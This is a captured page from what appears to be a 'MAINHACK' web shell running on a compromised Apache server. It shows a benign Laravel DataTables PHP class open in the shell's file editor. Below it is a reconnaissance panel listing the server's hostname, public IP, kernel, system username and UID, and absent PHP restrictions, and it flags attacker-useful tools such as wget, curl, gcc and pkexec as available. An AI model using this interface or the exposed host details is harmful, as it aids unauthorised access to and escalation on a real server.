[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: FormOptions.php
<?php namespace Yajra\DataTables\Html\Editor; use Illuminate\Support\Fluent; /** * @see https://editor.datatables.net/reference/type/form-options */ class FormOptions extends Fluent { public static function make(array $attributes = []): static { return new static($attributes); } /** * @return $this * * @see https://editor.datatables.net/reference/type/form-options#focus */ public function focus(int|string|null $value = null): static { $this->attributes['focus'] = $value; return $this; } /** * @return $this * * @see https://editor.datatables.net/reference/type/form-options#nest */ public function nest(bool $value): static { $this->attributes['nest'] = $value; return $this; } /** * @return $this * * @see https://editor.datatables.net/reference/type/form-options#onBackground */ public function onBackground(string $value = 'blur'): static { $this->attributes['onBackground'] = $value; return $this; } /** * @return $this * * @see https://editor.datatables.net/reference/type/form-options#onBlur */ public function onBlur(string $value = 'close'): static { $this->attributes['onBlur'] = $value; return $this; } /** * @return $this * * @see https://editor.datatables.net/reference/type/form-options#onComplete */ public function onComplete(string $value = 'close'): static { $this->attributes['onComplete'] = $value; return $this; } /** * @return $this * * @see https://editor.datatables.net/reference/type/form-options#onEsc */ public function onEsc(string $value = 'close'): static { $this->attributes['onEsc'] = $value; return $this; } /** * @return $this * * @see https://editor.datatables.net/reference/type/form-options#onFieldError */ public function onFieldError(string $value = 'focus'): static { $this->attributes['onFieldError'] = $value; return $this; } /** * @return $this * * @see https://editor.datatables.net/reference/type/form-options#onReturn */ public function onReturn(string $value = 'submit'): static { $this->attributes['onReturn'] = $value; return $this; } /** * @return $this * * @see https://editor.datatables.net/reference/type/form-options#submit */ public function submit(string $value = 'changed'): static { $this->attributes['submit'] = $value; return $this; } /** * @return $this * * @see https://editor.datatables.net/reference/type/form-options#scope */ public function formScope(string $value = 'row'): static { $this->attributes['scope'] = $value; return $this; } /** * @return $this * * @see https://editor.datatables.net/reference/type/form-options#buttons */ public function buttons(array|string $value): static { $this->attributes['buttons'] = $value; return $this; } /** * @return $this * * @see https://editor.datatables.net/reference/type/form-options#drawType */ public function drawType(string $value = ''): static { $this->attributes['drawType'] = $value; return $this; } /** * @return $this * * @see https://editor.datatables.net/reference/type/form-options#message */ public function message(bool|string $value = ''): static { $this->attributes['message'] = $value; return $this; } /** * @return $this * * @see https://editor.datatables.net/reference/type/form-options#submitTrigger */ public function submitTrigger(int|string $value): static { $this->attributes['submitTrigger'] = $value; return $this; } /** * @return $this * * @see https://editor.datatables.net/reference/type/form-options#submitHtml */ public function submitHtml(string $value): static { $this->attributes['submitHtml'] = $value; return $this; } /** * @return $this * * @see https://editor.datatables.net/reference/type/form-options#title */ public function title(bool|string $value): static { $this->attributes['title'] = $value; return $this; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.7 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002